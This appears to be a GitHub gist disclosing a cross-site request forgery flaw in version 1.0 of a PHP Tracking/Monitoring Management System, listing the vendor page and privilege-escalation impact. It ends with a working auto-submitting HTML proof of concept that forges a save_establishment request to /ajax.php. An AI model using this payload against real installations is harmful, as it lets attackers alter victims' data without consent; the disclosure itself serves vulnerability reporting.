Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save topsky979/ac97a335ed9fcf4eefe3c952928a6d0e to your computer and use it in GitHub Desktop.
Save topsky979/ac97a335ed9fcf4eefe3c952928a6d0e to your computer and use it in GitHub Desktop.

[description]

Tracking/Monitoring Management System was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /ajax.php.


[Vulnerability Type]

Cross-site request forgery(CSRF)


[Vendor of Product]

https://www.sourcecodester.com/php/14491/trackingmonitoring-management-system-using-phpmysql-source-code.html


[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.0.183:11180/ajax.php?action=save_establishment" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="name" value="Sample&#32;Mall" />
      <input type="hidden" name="address" value="Sample&#32;Only" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment